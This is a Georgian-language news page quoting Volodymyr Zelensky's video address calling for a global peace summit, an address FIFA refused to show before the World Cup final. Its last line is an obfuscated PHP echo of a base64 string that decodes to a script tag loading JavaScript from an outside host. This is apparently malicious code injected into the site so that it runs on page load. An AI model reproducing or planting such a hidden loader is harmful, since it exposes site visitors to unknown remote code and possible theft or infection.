celsiusi
ავერსი შნაიდერი
"გთხოვთ, დაეხმარეთ უკრაინას და ჩვენს მცდელობას რომ აღვადგინოთ მშვიდობა! შეუერთდით გლობალური მშვიდობის ფორმულის სამიტს" - ამის შესახებ უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი საუბრობს ვიდეომიმართვაში, რომლის მსოფლიო ჩემპიონატის დაწყებამდე ჩვენებაზეც FIFA-მ უარი უთხრა.
თბილი სალამი უკრაინიდან ფეხბურთის ყველა ფანს, სიცოცხლე და მშვიდობა! მე ვულოცავ მთელს პლანეტას მსოფლიო ჩემპიონატის ფინალს. დღეს ჩვენ მომსწრენი გავხდებით საერთო გამარჯვების - ადამიანების სულის ზეიმის. ამ მსოფლიო ჩემპიონატმა არაერთხელ დაამტკიცა, რომ სხვადასხვა ქვეყნებს შეუძლიათ სამართლიანი თამაშით, და არა ცეცხლთან თამაშით, გადაწყვიტონ ვინ არის ყველაზე ძლიერი. მწვანე სათამაშო მოედანზე და არა წითელ საბრძოლო ველზე.
ეს ძალიან ბევრი ადამიანის ოცნებაა, როდესაც მოთამაშეები ერთმანეთს ეჯიბრებიან, რათა ყველამ ისიამოვნოს მშვიდობით. ყველა მამას უნდა რომ მისი შვილი საფეხბურთო მატჩზე წაიყვანოს და ყველა დედას უნდა, რომ მისი შვილი ომიდან მშვიდობით დაბრუნდეს. რა დროც არ უნდა იყოს, უკრაინა მუდამ მიილტვის მშვიდობისკენ. ჩვენ მსოფლიოს შევთავაზეთ მშვიდობის ფორმულა. ჩვენ გთავაზობთ მშვიდობის ფორმულას, რადგან ომში არ არსებობენ ჩემპიონები, აქ არ შეიძლება იყოს ფრე.
ამიტომ, მე ვაანონსებ ინიციატივას, რომ გავმართოთ მსოფლიო მშვიდობის ფორუმის სამიტი ზამთარში. ეს სამიტი გააერთიანებს ყველა ერს გლობალური მშვიდობის გარშემო. ამ მატჩის შემდეგ სტადიონები დაცარიელდება, ზუსტად ისე როგორც ქალაქები ცარიელდება ომის შემდგომ. ამიტომ უნდა დამარცხდნენ ომები და მშვიდობა უნდა იყოს ჩემპიონობა, როგორც ახლა აქ არის - კატარში! მსოფლიო ჩემპიონატი და არა მსოფლიო ომი. ეს შესაძლებელია!
გთხოვთ, დაეხმარეთ უკრაინას და ჩვენს მცდელობას რომ აღვადგინოთ მშვიდობა! შეუერთდით გლობალური მშვიდობის ფორმულის სამიტს და გახდით მშვიდობის ჩემპიონები! შევხვდეთ ფინალს და ომის დასრულებას ერთად. დიდება უკრაინას და ბედნიერი კატარის დღე! - ამბობს ზელენსკი. 
შეგახსენებთ, რომ FIFA-მ უკრაინის პრეზიდენტს, ვოლოდიმირ ზელენსკის უარი უთხრა თხოვნაზე, რომ მსოფლიო ჩემპიონატის ფინალის დაწყებამდე მაყურებლებისთვის მიემართა.
480
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");